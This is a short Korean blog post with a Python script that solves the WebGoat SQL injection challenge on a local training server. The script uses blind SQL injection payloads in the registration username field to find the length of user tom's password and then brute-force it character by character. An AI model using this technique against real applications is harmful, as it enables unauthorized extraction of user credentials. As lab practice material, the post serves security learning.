[파이썬] WebGoat Brute Force 파이썬 코드

import requests

password = str()
cre = "created"
url = "http://localhost:8080/WebGoat/SqlInjection/challenge"
cookie = {'JSESSIONID':'8B10E84050C998DD12174E500DBA38F6'}

print ('[*] Get password length...')
password_length = int()

for length in range(1,30):
    datas = {'username_reg' : "tom' and length(password) = %d and '1'='1" % length,  'email_reg' : 'test@test.com', 'password_reg' : '1111', 'confirm_password_reg' : '1111'}

    r = requests.put(url,datas,cookies=cookie)
    password_length+=1
   
    if 'created' in r.content.decode():
        print(password_length)
        continue

    if 'exists' in r.content.decode():
        break

    if "Internal Server Error" in r.content.decode():
        print("SQL ERROR")
        print(r.text)
        break
   
print ('[!] Done!!!')
print ("[*] Length of password id %d" % password_length)
print ('[*] Hack the password')

for i in range(1, password_length +1 ):
    for c in range(0x61,0x7b):

        payload = "tom' and substr(password, %d, 1) = '%c' and '1'='1" % (i, c)
        data = {'username_reg': payload, 'email_reg' : 'test@test.com', 'password_reg' : '1111', 'confirm_password_reg' : '1111'}
        r = requests.put(url,data,cookies=cookie)
     
        print(r.content.decode())
        print(password)
        
        if 'created' in r.content.decode():
            continue

        if 'different' in r.content.decode():
            password += chr(c)
            break
        
        if 'Internal Server Error' in r.content.decode():
  
            continue

print ("[*] Tom's pw : %s" % password)

request 패킷을 challenge에 파라미터를 보낸다. ID 부분에 blind sql injection으로 비밀번호 길이를 알아낸다. response 패킷으로 본문 내용중에 created 또는 exists 가 포함되어 있을경우 다음 로직을 처리한다. 길이를 알아낸후 Brute Force를 수행한다. a~zA~z 문자의 범위로 비밀번호를 탐색한다. 문자 비교 sql 을 만들어 blind injection을 수행한다. response의 패킷 내용을 통해 응답을 판단하고 비밀번호를 찾아내게 된다.